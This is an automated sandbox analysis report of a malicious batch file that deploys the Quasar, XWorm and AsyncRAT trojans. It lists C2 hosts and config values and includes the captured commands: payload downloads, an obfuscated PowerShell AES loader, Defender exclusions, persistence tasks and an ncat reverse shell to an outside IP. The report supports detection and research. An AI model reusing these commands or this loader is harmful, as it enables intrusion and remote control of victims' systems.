Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
02-07-2024 22:41
Static task
static1
General
-
Target
4Xc1zTf.bat
-
Size
313B
-
MD5
83b90daf2dc1611ccacd57f90a9e7dcd
-
SHA1
bcc229dcfe50608ada43b87105e423f88deb09f3
-
SHA256
3598bd743d78bb85de33127f0584f9d37d0775fa5166b721b153deeeea0c172b
-
SHA512
1aadf9c3cf7e540e09929bb9b834af192d9edc7196c6e44e4d77f8df2d26404509381306bcbd405d86dd47df403a375220b097aa7fd05162422c1dd594df3778
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
3.1.5
Slave
stop-largely.gl.at.ply.gg:27116
$Sxr-kl1r656AGsPQksTmi8
-
encryption_key
CjDCAPF1JiLswgFipef3
-
install_name
$77Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Start-Up Application
-
subdirectory
$77
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2796-72-0x000002B3CDD80000-0x000002B3CDD9A000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\7zip.exe family_xworm behavioral1/memory/2652-111-0x0000000000E90000-0x0000000000EA6000-memory.dmp family_xworm behavioral1/memory/2652-234-0x000000001C980000-0x000000001C98E000-memory.dmp family_xworm behavioral1/memory/4476-385-0x000001EBA93C0000-0x000001EBA93D6000-memory.dmp family_xworm -
Quasar payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/5020-34-0x0000014977DB0000-0x0000014978884000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\wininit.exe family_quasar behavioral1/memory/3224-112-0x0000000000F40000-0x0000000000FAC000-memory.dmp family_quasar -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\conhost.exe family_asyncrat -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 15 2556 powershell.exe 17 2556 powershell.exe 55 2796 powershell.exe 79 2796 powershell.exe 107 2796 powershell.exe 108 4476 powershell.exe 110 4476 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Powershell Invoke Web Request.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2556 powershell.exe 5020 powershell.exe 3164 powershell.exe 2796 powershell.exe 4476 powershell.exe 4784 powershell.exe 816 powershell.exe 1412 powershell.exe 2720 powershell.exe 4480 powershell.exe 5084 powershell.exe 2424 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exe7zip.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation 7zip.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe -
Executes dropped EXE 18 IoCs
Processes:
7zip.exewininit.execonhost.exeWinRunner.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exepid process 2652 7zip.exe 3224 wininit.exe 1588 conhost.exe 2516 WinRunner.exe 2240 ncat.exe 4504 ncat.exe 1612 ncat.exe 1652 ncat.exe 5044 ncat.exe 3988 ncat.exe 3816 ncat.exe 1716 ncat.exe 4420 ncat.exe 4172 ncat.exe 1576 ncat.exe 1920 ncat.exe 4044 ncat.exe 2356 ncat.exe -
Loads dropped DLL 30 IoCs
Processes:
ncat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exencat.exepid process 2240 ncat.exe 2240 ncat.exe 2240 ncat.exe 4504 ncat.exe 4504 ncat.exe 1612 ncat.exe 1612 ncat.exe 1652 ncat.exe 1652 ncat.exe 5044 ncat.exe 5044 ncat.exe 3988 ncat.exe 3988 ncat.exe 3816 ncat.exe 3816 ncat.exe 1716 ncat.exe 1716 ncat.exe 4420 ncat.exe 4420 ncat.exe 4172 ncat.exe 4172 ncat.exe 1576 ncat.exe 1576 ncat.exe 1576 ncat.exe 1920 ncat.exe 1920 ncat.exe 4044 ncat.exe 4044 ncat.exe 2356 ncat.exe 2356 ncat.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
WinRunner.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinRunner.exe" WinRunner.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\Users\\Admin\\AppData\\Roaming\\powershell.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 52 ip-api.com -
Drops file in System32 directory 3 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\powershell svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2908 schtasks.exe 4848 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe7zip.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2556 powershell.exe 2556 powershell.exe 5020 powershell.exe 5020 powershell.exe 3164 powershell.exe 3164 powershell.exe 2796 powershell.exe 2796 powershell.exe 396 powershell.exe 396 powershell.exe 4480 powershell.exe 4480 powershell.exe 5084 powershell.exe 5084 powershell.exe 4480 powershell.exe 5084 powershell.exe 4784 powershell.exe 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 4784 powershell.exe 4784 powershell.exe 2796 powershell.exe 2796 powershell.exe 2652 7zip.exe 2652 7zip.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 2052 powershell.exe 2052 powershell.exe 2052 powershell.exe 1248 powershell.exe 1248 powershell.exe 1248 powershell.exe 696 powershell.exe 696 powershell.exe 696 powershell.exe 2964 powershell.exe 2964 powershell.exe 2964 powershell.exe 856 powershell.exe 856 powershell.exe 856 powershell.exe 316 powershell.exe 316 powershell.exe 316 powershell.exe 5020 powershell.exe 5020 powershell.exe 748 powershell.exe 748 powershell.exe 1212 powershell.exe 1212 powershell.exe 3828 powershell.exe 3828 powershell.exe 1832 powershell.exe 1832 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeIncreaseQuotaPrivilege 3164 powershell.exe Token: SeSecurityPrivilege 3164 powershell.exe Token: SeTakeOwnershipPrivilege 3164 powershell.exe Token: SeLoadDriverPrivilege 3164 powershell.exe Token: SeSystemProfilePrivilege 3164 powershell.exe Token: SeSystemtimePrivilege 3164 powershell.exe Token: SeProfSingleProcessPrivilege 3164 powershell.exe Token: SeIncBasePriorityPrivilege 3164 powershell.exe Token: SeCreatePagefilePrivilege 3164 powershell.exe Token: SeBackupPrivilege 3164 powershell.exe Token: SeRestorePrivilege 3164 powershell.exe Token: SeShutdownPrivilege 3164 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeSystemEnvironmentPrivilege 3164 powershell.exe Token: SeRemoteShutdownPrivilege 3164 powershell.exe Token: SeUndockPrivilege 3164 powershell.exe Token: SeManageVolumePrivilege 3164 powershell.exe Token: 33 3164 powershell.exe Token: 34 3164 powershell.exe Token: 35 3164 powershell.exe Token: 36 3164 powershell.exe Token: SeIncreaseQuotaPrivilege 3164 powershell.exe Token: SeSecurityPrivilege 3164 powershell.exe Token: SeTakeOwnershipPrivilege 3164 powershell.exe Token: SeLoadDriverPrivilege 3164 powershell.exe Token: SeSystemProfilePrivilege 3164 powershell.exe Token: SeSystemtimePrivilege 3164 powershell.exe Token: SeProfSingleProcessPrivilege 3164 powershell.exe Token: SeIncBasePriorityPrivilege 3164 powershell.exe Token: SeCreatePagefilePrivilege 3164 powershell.exe Token: SeBackupPrivilege 3164 powershell.exe Token: SeRestorePrivilege 3164 powershell.exe Token: SeShutdownPrivilege 3164 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeSystemEnvironmentPrivilege 3164 powershell.exe Token: SeRemoteShutdownPrivilege 3164 powershell.exe Token: SeUndockPrivilege 3164 powershell.exe Token: SeManageVolumePrivilege 3164 powershell.exe Token: 33 3164 powershell.exe Token: 34 3164 powershell.exe Token: 35 3164 powershell.exe Token: 36 3164 powershell.exe Token: SeIncreaseQuotaPrivilege 3164 powershell.exe Token: SeSecurityPrivilege 3164 powershell.exe Token: SeTakeOwnershipPrivilege 3164 powershell.exe Token: SeLoadDriverPrivilege 3164 powershell.exe Token: SeSystemProfilePrivilege 3164 powershell.exe Token: SeSystemtimePrivilege 3164 powershell.exe Token: SeProfSingleProcessPrivilege 3164 powershell.exe Token: SeIncBasePriorityPrivilege 3164 powershell.exe Token: SeCreatePagefilePrivilege 3164 powershell.exe Token: SeBackupPrivilege 3164 powershell.exe Token: SeRestorePrivilege 3164 powershell.exe Token: SeShutdownPrivilege 3164 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeSystemEnvironmentPrivilege 3164 powershell.exe Token: SeRemoteShutdownPrivilege 3164 powershell.exe Token: SeUndockPrivilege 3164 powershell.exe Token: SeManageVolumePrivilege 3164 powershell.exe Token: 33 3164 powershell.exe Token: 34 3164 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
wininit.exepowershell.exe7zip.exepowershell.exepid process 3224 wininit.exe 2796 powershell.exe 2652 7zip.exe 4476 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exeWinRunner.execmd.exencat.exe7zip.exewininit.exencat.exencat.exencat.exedescription pid process target process PID 3880 wrote to memory of 2556 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 2556 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 5104 3880 cmd.exe curl.exe PID 3880 wrote to memory of 5104 3880 cmd.exe curl.exe PID 3880 wrote to memory of 2136 3880 cmd.exe cmd.exe PID 3880 wrote to memory of 2136 3880 cmd.exe cmd.exe PID 3880 wrote to memory of 5020 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 5020 3880 cmd.exe powershell.exe PID 5020 wrote to memory of 3164 5020 powershell.exe powershell.exe PID 5020 wrote to memory of 3164 5020 powershell.exe powershell.exe PID 5020 wrote to memory of 1088 5020 powershell.exe WScript.exe PID 5020 wrote to memory of 1088 5020 powershell.exe WScript.exe PID 1088 wrote to memory of 3744 1088 WScript.exe cmd.exe PID 1088 wrote to memory of 3744 1088 WScript.exe cmd.exe PID 3744 wrote to memory of 2384 3744 cmd.exe cmd.exe PID 3744 wrote to memory of 2384 3744 cmd.exe cmd.exe PID 3744 wrote to memory of 2796 3744 cmd.exe powershell.exe PID 3744 wrote to memory of 2796 3744 cmd.exe powershell.exe PID 2796 wrote to memory of 2652 2796 powershell.exe 7zip.exe PID 2796 wrote to memory of 2652 2796 powershell.exe 7zip.exe PID 2796 wrote to memory of 3224 2796 powershell.exe wininit.exe PID 2796 wrote to memory of 3224 2796 powershell.exe wininit.exe PID 2796 wrote to memory of 3224 2796 powershell.exe wininit.exe PID 2796 wrote to memory of 1588 2796 powershell.exe conhost.exe PID 2796 wrote to memory of 1588 2796 powershell.exe conhost.exe PID 2796 wrote to memory of 2516 2796 powershell.exe WinRunner.exe PID 2796 wrote to memory of 2516 2796 powershell.exe WinRunner.exe PID 2516 wrote to memory of 1044 2516 WinRunner.exe cmd.exe PID 2516 wrote to memory of 1044 2516 WinRunner.exe cmd.exe PID 1044 wrote to memory of 2240 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 2240 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 2240 1044 cmd.exe ncat.exe PID 2240 wrote to memory of 396 2240 ncat.exe powershell.exe PID 2240 wrote to memory of 396 2240 ncat.exe powershell.exe PID 2240 wrote to memory of 396 2240 ncat.exe powershell.exe PID 2796 wrote to memory of 4480 2796 powershell.exe powershell.exe PID 2796 wrote to memory of 4480 2796 powershell.exe powershell.exe PID 2652 wrote to memory of 5084 2652 7zip.exe powershell.exe PID 2652 wrote to memory of 5084 2652 7zip.exe powershell.exe PID 3224 wrote to memory of 4848 3224 wininit.exe schtasks.exe PID 3224 wrote to memory of 4848 3224 wininit.exe schtasks.exe PID 3224 wrote to memory of 4848 3224 wininit.exe schtasks.exe PID 2796 wrote to memory of 2424 2796 powershell.exe powershell.exe PID 2796 wrote to memory of 2424 2796 powershell.exe powershell.exe PID 2652 wrote to memory of 4784 2652 7zip.exe powershell.exe PID 2652 wrote to memory of 4784 2652 7zip.exe powershell.exe PID 1044 wrote to memory of 4504 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 4504 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 4504 1044 cmd.exe ncat.exe PID 4504 wrote to memory of 4424 4504 ncat.exe powershell.exe PID 4504 wrote to memory of 4424 4504 ncat.exe powershell.exe PID 4504 wrote to memory of 4424 4504 ncat.exe powershell.exe PID 1044 wrote to memory of 1612 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 1612 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 1612 1044 cmd.exe ncat.exe PID 1612 wrote to memory of 2052 1612 ncat.exe powershell.exe PID 1612 wrote to memory of 2052 1612 ncat.exe powershell.exe PID 1612 wrote to memory of 2052 1612 ncat.exe powershell.exe PID 1044 wrote to memory of 1652 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 1652 1044 cmd.exe ncat.exe PID 1044 wrote to memory of 1652 1044 cmd.exe ncat.exe PID 1652 wrote to memory of 1248 1652 ncat.exe powershell.exe PID 1652 wrote to memory of 1248 1652 ncat.exe powershell.exe PID 1652 wrote to memory of 1248 1652 ncat.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4Xc1zTf.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/ReaImastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat -OutFile libuac.dll.bat"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.execurl -o libuca.dll.bat https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Local\Temp\libuac.dll.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_249_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_249.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Roaming\Windows_Log_249.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zip.exe"C:\Users\Admin\AppData\Local\Temp\7zip.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\wininit.exe"C:\Users\Admin\AppData\Local\Temp\wininit.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Start-Up Application" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\WinRunner.exe"C:\Users\Admin\AppData\Local\Temp\WinRunner.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\$TMP~.bat"8⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
